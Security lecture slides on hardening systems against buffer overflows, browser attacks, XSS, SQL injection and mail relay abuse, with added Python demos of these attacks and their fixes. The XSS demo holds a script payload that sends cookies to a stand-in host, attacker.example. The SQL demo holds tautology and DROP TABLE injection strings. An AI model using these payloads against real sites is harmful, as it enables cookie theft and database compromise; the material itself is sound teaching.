Lecture slides: Protecting Systems
64 pages | Shared by: vutrong32
Protecting Systems

Drive-by Downloads
- At least one in ten Web pages is booby-trapped with malware
- Just viewing an infected Web page installs malware on your computer, if your operating system and browser are vulnerable

Objectives
- Explain how to harden operating systems
- List ways to prevent attacks through a Web browser
- Define SQL injection and explain how to protect against it
- Explain how to protect systems from communications-based attacks
- Describe various software security applications

Hardening the Operating System
Three steps:
- Updates to the operating system
- Protecting against buffer overflows
- Configuring operating system protections

Managing Operating System Updates
- Operating systems are huge and contain many bugs (errors in code)
- Linux contains 0.17 bugs per 1,000 lines of code
- Typical commercial software contains 20-30 bugs per 1,000 lines of code
- 81 bugs a day were reported for Windows Vista Beta 2
- Some of those bugs create vulnerabilities

Update Terminology
- Security patch: a general software security update intended to cover vulnerabilities that have been discovered
- Hotfix: addresses a specific customer situation; often may not be distributed outside that customer's organization
- Service pack: a cumulative package of all security updates plus additional features

Patch Management Techniques
- Automatic Updates options
- Patches can sometimes create new problems

Automated Patch Update Service
- Used to manage patches locally instead of relying upon the vendor's online update service
- Advantages:
  - Administrators can test patches before deploying them
  - Every machine is updated simultaneously
  - Users cannot disable or circumvent updates
  - Can save bandwidth and time
  - Computers that do not have Internet access can receive updates

Buffer Overflow Protection
- Buffer overflow: occurs when a process attempts to store data in random access memory (RAM) beyond the boundaries of a fixed-length storage buffer
- Extra data overflows into the adjacent memory locations and under certain conditions may cause the computer to stop functioning
- Attackers also use a buffer overflow in order to compromise a computer
- Basic defenses:
  - Write "defensive" program code that will protect against these attacks
  - Use a programming language that makes these attacks more difficult
  - For Windows-based systems, there are two defenses against buffer overflows: data execution prevention (DEP) and address space layout randomization (ASLR)

Data Execution Prevention (DEP)
- Most modern CPUs support an NX (No eXecute) bit to designate a part of memory as containing only data
- DEP will not allow code in that memory area to be executed
- Windows Vista allows software developers to enable NX hardware protection specifically for the application software that they develop
- In Windows 7: Start, right-click Computer, Properties, Advanced System Settings, Advanced tab, Performance Settings

Address Space Layout Randomization (ASLR)
- Randomly assigns executable operating system code to one of 256 possible locations in memory (the 8 bits of image-base entropy in 32-bit Windows Vista)
- This makes it harder for an attacker to locate and take advantage of any functionality inside these executables
- ASLR is most effective when it is used in conjunction with DEP

How to See ASLR
- Download Process Explorer
- Show the lower pane: View, Lower Pane View, DLLs
- View, Select Columns, DLL tab, Base Address
- Select explorer.exe and find ntdll.dll
- Reboot to see the base address change

Configuring Operating System Protection
Four steps:
- Security policy: define the defense mechanisms the company will use
- Configuration baseline: operating system settings
- Security template: a set of settings in a single package
- Deployment: manually or through Group Policy

Preventing Attacks That Target the Web Browser
Attack techniques:
- Cookies
- JavaScript
- Java
- ActiveX
- Cross-site scripting (XSS)

Cookies
- Cookies are computer files that contain user-specific information
- Types of cookies: first-party cookie, third-party cookie
- Cookies can pose a privacy risk: they can be used to track the browsing or buying habits of a user
- Defenses against cookies include disabling the creation of cookies or deleting them once they are created

JavaScript
- Developed by Netscape
- Scripting language that does not create standalone applications
- Scripting language: a computer programming language that is typically interpreted into a language the computer can understand
- Visiting a Web site that automatically downloads a program to run on a local computer can be dangerous
- Several defense mechanisms prevent JavaScript programs from causing serious harm:
  - JavaScript cannot read or write files
  - JavaScript cannot connect to other machines on your LAN
- Other security concerns remain: JavaScript programs can capture and send user information without the user's knowledge or authorization
- The defense against JavaScript is to disable it within the Web browser

Java
- A complete object-oriented programming language created by Sun Microsystems
- Can be used to create standalone applications
- Java applet: a separate program stored on a Web server and downloaded onto a user's computer along with HTML code; can also be made into a hostile program
- Sandbox is a defense against a hostile Java applet: it surrounds the program and keeps it away from private data and other resources on the local computer
- Two types of Java applets:
  - Unsigned Java applet: program that does not come from a trusted source
  - Signed Java applet: has information proving the program is from a trusted source and has not been altered

ActiveX
- Set of technologies developed by Microsoft
- Not a programming language but a set of rules for how applications should share information
- ActiveX controls: also called add-ons or ActiveX applications; represent a specific way of implementing ActiveX
  - Can perform many of the same functions as a Java applet, but do not run in a sandbox
  - Have full access to the Windows operating system
- ActiveX poses a number of security concerns
- Nearly all ActiveX control security mechanisms are set in Internet Explorer
- ActiveX controls do not rely exclusively on Internet Explorer: they can be installed and executed independently
- The defense against ActiveX is to disable it within the Web browser

Cross Site Scripting (XSS)
- An attack in which malicious code is inserted into a specific type of dynamic Web page
- Typically involves using client-side scripts written in JavaScript or ActiveX
- Designed to extract information from the victim and then pass the information to the attacker
- Targeted at Web sites that dynamically generate Web pages that redisplay (echo) user input that has not been properly validated
- Attack steps:
  1. An attacker searches for a Web site that redisplays a bad login (see Figures 3-8 and 3-9)
  2. The attacker then creates an attack URL that contains the embedded JavaScript commands
  3. A fake e-mail is sent to unsuspecting users with the attack URL as a modified embedded link in the e-mail
  4. The unsuspecting victim clicks on the attack URL and enters his username and password
- Defenses against XSS involve both the webmasters of legitimate sites and users:
  - Webmasters should check that all user input is validated and that attackers do not have the ability to inject code; in practice this also means encoding user-supplied data before it is echoed into a page
  - They also should be sure that all Web services and database software is patched to prevent XSS
  - Users should never click on embedded links in e-mails

SQL Injection
- One of the most common types of attacks
- Uses a form of injection like XSS
- Hinges on an attacker being able to enter an SQL database query into a dynamic Web page
- SQL (Structured Query Language): a language used to view and manipulate data that is stored in a relational database
- Demonstration site: Hackthissite.org (don't put anything true about you on this site: they are real criminals)
- (Screenshot: the injected query displays the entire username database)
- Variations of the SQL injection attack:
  - Deleting data from the database
  - Accessing the host operating system through function calls
  - Retrieving a list of all usernames and passwords

Hardening Web Servers

SMTP Open Relays
- E-mail systems use two TCP/IP protocols to send and receive messages:
  - Simple Mail Transfer Protocol (SMTP) handles outgoing mail
  - Post Office Protocol (POP3 for the current version) handles incoming mail
- IMAP (Internet Message Access Protocol): a more advanced protocol that solves many problems
  - E-mail remains on the e-mail server
  - Mail can be organized into folders and read from any computer
  - Current version is IMAP4
- SMTP relay: SMTP servers can forward e-mail sent from an e-mail client to a remote domain
- SMTP open relay: if SMTP relay is not controlled, an attacker can use it to forward thousands of spam e-mail messages
- The defenses against SMTP open relay are to turn off mail relay altogether, so that all users send and receive e-mail from the local SMTP server only, or to limit relays to local users only

Instant Messaging
- Instant messaging (IM): real-time communication between two or more users
- Can also be used to chat between several users simultaneously, to send and receive files, and to receive real-time stock quotes and news
- Basic IM has several security vulnerabilities:
  - IM provides a direct connection to the user's computer; attackers can use this connection to spread viruses and worms
  - IM is not encrypted by default, so attackers could view the content of messages
- Steps to secure IM include:
  - Keep the IM server within the organization's firewall and only permit users to send and receive messages with trusted internal workers
  - Enable IM virus scanning
  - Block all IM file transfers
  - Encrypt messages

Peer-to-Peer (P2P) Networks
- Peer-to-peer (P2P) network: uses a direct connection between users
- Does not have servers, so each device simultaneously functions as both a client and a server to all other devices connected to the network
- P2P networks are typically used for connecting devices on an ad hoc basis, for file sharing of audio, video, and data, or for real-time data transmission such as telephony traffic
- Viruses, worms, Trojan horses, and spyware can be sent using P2P
- A newer type of P2P network has emerged known as BitTorrent
  - Torrents are active Internet connections that download a specific file available through a tracker: a server program operated by the person or organization that wants to share the file
  - With BitTorrent, files are advertised
  - BitTorrent downloads are often illegal and may contain malware

Applying Software Security Applications
- Antivirus
- Anti-spam
- Popup blockers
- Personal software firewalls
- Host intrusion detection systems

Antivirus
- Antivirus (AV) software scans a computer for infections as well as monitoring computer activity and scanning all new documents, such as e-mail attachments, that might contain a virus
- If a virus is detected, options generally include cleaning the file of the virus, quarantining the infected file, or deleting the file
- The drawback of AV software is that it must be continuously updated to recognize new viruses
- AV software uses definition files or signature files

Popup Blockers
- Popup: a small Web browser window that appears over the Web site that is being viewed
- Popup blocker: allows the user to limit or block most popups
  - Can be either a separate program or a feature incorporated within a browser
  - As a separate program, popup blockers are often part of a package known as antispyware, which helps prevent computers from becoming infected by different types of spyware

Anti-Spam
- Two different options for installing a corporate spam filter:
  - Install the spam filter with the SMTP server (see Figure 3-14)
  - Install the spam filter with the POP3 server (see Figure 3-15)
- A third method is to filter spam on the local computer; typically the e-mail client contains several different features to block spam, such as:
  - Level of junk e-mail protection
  - Blocked senders
  - Allowed senders
  - Blocked top-level domain list
- A final method of spam filtering is to install separate filtering software that works with the e-mail client software
- Gmail's spam filter: very effective, free, and automatic (effortless to use)

Personal Software Firewalls
- Firewall, sometimes called a packet filter: designed to prevent malicious packets from entering or leaving computers
- Can be software-based or hardware-based
- Personal software firewall: runs as a program on a local system to protect it against attacks
- Many operating systems now come with personal software firewalls, or they can be installed as separate programs

Host Intrusion Detection Systems (HIDS)
- Monitors the activity of the local host, including the network traffic it sends and receives
- Detects and possibly prevents attempts to
- HIDS are software-based and run on a local computer
- These systems can be divided into four groups:
  - File system monitors
  - Logfile analyzers
  - Connection analyzers
  - Kernel analyzers
- HIDS compare new behavior against normal behavior
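Worked example for the Cross Site Scripting (XSS) slides above (an added example, not part of the original lecture deck): a login page that echoes the submitted username back on failure, the kind of attack URL described in the attack steps, and the two defenses the slides call for, input validation and output encoding. The site name, the `user` query parameter, the payload and the allowed-character rule for usernames are assumptions made for this example.

```python
import html
import re
from urllib.parse import parse_qs, urlencode, urlparse

# Constructed attack URL for the "bad login" scenario: the site, the "user"
# parameter and the payload are assumptions made for this example.
ATTACK_URL = "http://shop.example/login?" + urlencode({
    "user": '<script>new Image().src="http://attacker.example/c?"'
            '+encodeURIComponent(document.cookie)</script>',
})

# Allow-list of characters a plain account name may contain (an assumption).
USERNAME_RE = re.compile(r"^[A-Za-z0-9_.-]{1,32}$")


def username_from_url(url):
    """Return the 'user' query parameter that the login page echoes back."""
    return parse_qs(urlparse(url).query).get("user", [""])[0]


def render_login_error_vulnerable(user):
    """Echo the submitted username unmodified: the XSS bug on the slides."""
    return "<p>Login failed for user " + user + ". Please try again.</p>"


def render_login_error_safe(user):
    """Same page, but with every HTML-significant character encoded."""
    return ("<p>Login failed for user " + html.escape(user, quote=True)
            + ". Please try again.</p>")


def is_valid_username(user):
    """Input validation: reject anything that is not a plain account name."""
    return USERNAME_RE.match(user) is not None


def contains_script(page):
    """Does the rendered page still carry a live <script> tag?"""
    return "<script" in page.lower()


if __name__ == "__main__":
    user = username_from_url(ATTACK_URL)
    print("valid username?", is_valid_username(user))
    print("vulnerable:", render_login_error_vulnerable(user))
    print("safe:      ", render_login_error_safe(user))
```

The vulnerable renderer turns the attacker's parameter into a live script tag in the victim's browser; the safe renderer emits the same text as entities, and the allow-list check rejects the payload before it is ever used. Both defenses are worth having: validation stops the request, encoding protects every place the value is later displayed.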
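Worked example for the SQL Injection slides above (an added example, not part of the original lecture deck): a login check built by string concatenation beside the parameterized version, run against an in-memory SQLite table with constructed rows. It shows the "retrieve all usernames" variation succeeding against the concatenated query and failing against the bound-parameter query, and the "delete data" variation attempted as a stacked statement. The table layout, the sample users and the payloads are assumptions made for this example.

```python
import sqlite3

# Classic tautology payload: makes the WHERE clause true for every row.
INJECTION = "' OR '1'='1"


def build_db():
    """In-memory users table with constructed sample rows (plaintext
    passwords only to keep the example short)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?)",
        [("alice", "wonderland"), ("bob", "builder"), ("carol", "s3cret")],
    )
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """Build the query by string concatenation: attacker text becomes SQL."""
    sql = ("SELECT username FROM users WHERE username = '" + username
           + "' AND password = '" + password + "'")
    return [row[0] for row in conn.execute(sql)]


def login_parameterized(conn, username, password):
    """Same query with bound parameters: the values never become SQL text."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return [row[0] for row in conn.execute(sql, (username, password))]


def stacked_delete_attempt(conn):
    """The 'delete data' variation from the slides: a stacked DROP TABLE.
    Whether it works depends on the driver; Python's sqlite3 refuses to run a
    second statement in one execute() call, so here the table survives.
    Returns the number of rows left in the table."""
    try:
        login_vulnerable(conn, "x'; DROP TABLE users; --", "")
    except (sqlite3.Warning, sqlite3.Error):
        pass
    return conn.execute("SELECT COUNT(*) FROM users").fetchone()[0]


if __name__ == "__main__":
    db = build_db()
    print("legit user     :", login_vulnerable(db, "alice", "wonderland"))
    print("injected (vuln):", login_vulnerable(db, INJECTION, INJECTION))
    print("injected (safe):", login_parameterized(db, INJECTION, INJECTION))
    print("rows after DROP attempt:", stacked_delete_attempt(db))
```

With the tautology payload in both fields the concatenated query becomes `... WHERE username = '' OR '1'='1' AND password = '' OR '1'='1'`, which matches every row, so the whole username list comes back. The parameterized query compares the literal string `' OR '1'='1` against the columns and matches nothing. The stacked-statement caveat cuts both ways: a driver that refuses multiple statements blocks that one variation, but it does nothing against the tautology, so parameterization is the defense that matters.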
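Worked example for the Host Intrusion Detection Systems (HIDS) slides above, specifically the "file system monitor" group (an added example, not part of the original lecture deck): the monitor records a baseline of content hashes and permission bits for every regular file under a directory, then compares a later snapshot against it and reports added, removed, modified and permission-changed files. The scenario, the file names and the intruder's actions are constructed for this example, and the code assumes a POSIX file system so that permission bits are meaningful.

```python
import hashlib
import os
import shutil
import stat
import tempfile


def _sha256(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def snapshot(root):
    """Baseline: (sha256, permission bits) of every regular file under root,
    keyed by relative path with '/' separators."""
    result = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            st = os.lstat(path)
            if not stat.S_ISREG(st.st_mode):
                continue  # symlinks, devices etc. are out of scope here
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            result[rel] = (_sha256(path), stat.S_IMODE(st.st_mode))
    return result


def compare(baseline, current):
    """Turn two snapshots into the events a file system monitor alerts on."""
    events = []
    for rel in sorted(set(baseline) | set(current)):
        old, new = baseline.get(rel), current.get(rel)
        if old is None:
            events.append(("added", rel))
        elif new is None:
            events.append(("removed", rel))
        elif old[0] != new[0]:
            events.append(("modified", rel))
        elif old[1] != new[1]:
            events.append(("mode_changed", rel))
    return events


def _write(path, text, mode=0o644):
    with open(path, "w") as f:
        f.write(text)
    os.chmod(path, mode)


def demo():
    """Constructed scenario in a temporary directory: take a baseline, act like
    an intruder, then run the comparison. Returns the event list."""
    root = tempfile.mkdtemp()
    try:
        os.makedirs(os.path.join(root, "etc"))
        os.makedirs(os.path.join(root, "bin"))
        _write(os.path.join(root, "etc", "passwd"), "root:x:0:0::/root:/bin/sh\n")
        _write(os.path.join(root, "etc", "motd"), "welcome\n")
        _write(os.path.join(root, "bin", "ls"), "#!/bin/sh\necho ls\n", 0o755)
        baseline = snapshot(root)

        # Intruder: add a backdoor account, drop a tool, remove a file,
        # and set the setuid bit on an existing binary.
        _write(os.path.join(root, "etc", "passwd"),
               "root:x:0:0::/root:/bin/sh\nbackdoor:x:0:0::/:/bin/sh\n")
        _write(os.path.join(root, "bin", "nc"), "#!/bin/sh\n", 0o755)
        os.remove(os.path.join(root, "etc", "motd"))
        os.chmod(os.path.join(root, "bin", "ls"), 0o4755)

        return compare(baseline, snapshot(root))
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    for event, path in demo():
        print(f"{event:13} {path}")
```

This is the "compare new behavior against normal behavior" idea from the slides applied to the file system: the baseline is the normal state, and every difference is a candidate alert. In a real deployment the baseline must be stored where an intruder with root cannot rewrite it, and it has to be refreshed after legitimate patching, or the patch-management process on the earlier slides will itself trigger a flood of "modified" events.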
Attached files for this document:
- 03_protecting_systems_3319.pptx